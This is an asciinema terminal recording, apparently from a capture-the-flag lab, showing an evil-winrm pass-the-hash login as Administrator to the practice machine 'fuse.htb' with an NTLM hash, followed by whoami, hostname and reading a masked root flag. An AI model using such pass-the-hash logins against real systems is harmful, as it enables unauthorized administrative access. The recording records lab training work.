{"version": 2, "width": 211, "height": 49, "timestamp": 1592315935, "env": {"SHELL": "/usr/bin/zsh", "TERM": "screen"}}
[0.057718, "o", "\u001b[1m\u001b[3m\u001b[23m\u001b[1m\u001b[0m                                                                                                                                                                                                                  \r \r\u001bk..machines/fuse\u001b\\"]
[0.061194, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mfuse\u001b[00m \u001b[K"]
[0.06135, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[0.789425, "o", "asciinema rec"]
[0.941245, "o", "\u001b[13Devil-winrm -u Administrator -H 370ddcf45959b2293427baa70376e14e -i fuse.htb"]
[1.531676, "o", "\u001b[?1l\u001b>"]
[1.531749, "o", "\u001b[?2004l\r\r\n"]
[1.531979, "o", "\u001bkevil-winrm\u001b\\"]
[2.03321, "o", "\r\n\u001b[0;34mEvil-WinRM shell v2.3\u001b[0m\r\n\r\n"]
[2.033432, "o", "\u001b[0;34mInfo: Establishing connection to remote endpoint\u001b[0m\r\n\r\n"]
[6.309586, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[7.228605, "o", "w"]
[7.412516, "o", "h"]
[7.652519, "o", "o"]
[7.796754, "o", "a"]
[7.924628, "o", "m"]
[8.132644, "o", "i"]
[8.364732, "o", "\r\n"]
[9.50889, "o", "fabricorp\\administrator\r\n"]
[11.048121, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[11.525086, "o", "h"]
[12.157142, "o", "o"]
[12.398538, "o", "s"]
[12.653168, "o", "t"]
[13.333576, "o", "n"]
[13.453233, "o", "a"]
[13.581249, "o", "m"]
[13.693203, "o", "e"]
[13.862181, "o", "\r\n"]
[14.882622, "o", "Fuse\r\n"]
[16.47327, "o", "\u001b[0;31m*Evil-WinRM*\u001b[0m\u001b[0;1;33m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[17.309761, "o", "c"]
[17.429762, "o", "a"]
[17.541738, "o", "t"]
[17.741803, "o", " "]
[18.197968, "o", "."]
[18.341955, "o", "."]
[18.549924, "o", "/"]
[18.926023, "o", "D"]
[19.173995, "o", "e"]
[19.413964, "o", "s"]
[19.598205, "o", "k"]
[19.950107, "o", "t"]
[20.166171, "o", "o"]
[20.318366, "o", "p"]
[20.822351, "o", "/"]
[21.438408, "o", "r"]
[21.622335, "o", "o"]
[21.750193, "o", "o"]
[21.870304, "o", "t"]
[22.318624, "o", "."]
[22.694448, "o", "t"]
[22.830435, "o", "x"]
[22.94319, "o", "t"]
[23.262649, "o", "\r\n"]
[24.155284, "o", "d1-----------------------------b5\r\n"]
[27.802962, "o", "\r\u001b[0m\u001b[23m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mfuse\u001b[00m \u001b[K"]
[27.803095, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[28.367226, "o", "\u001b[?2004l\r\r\n"]

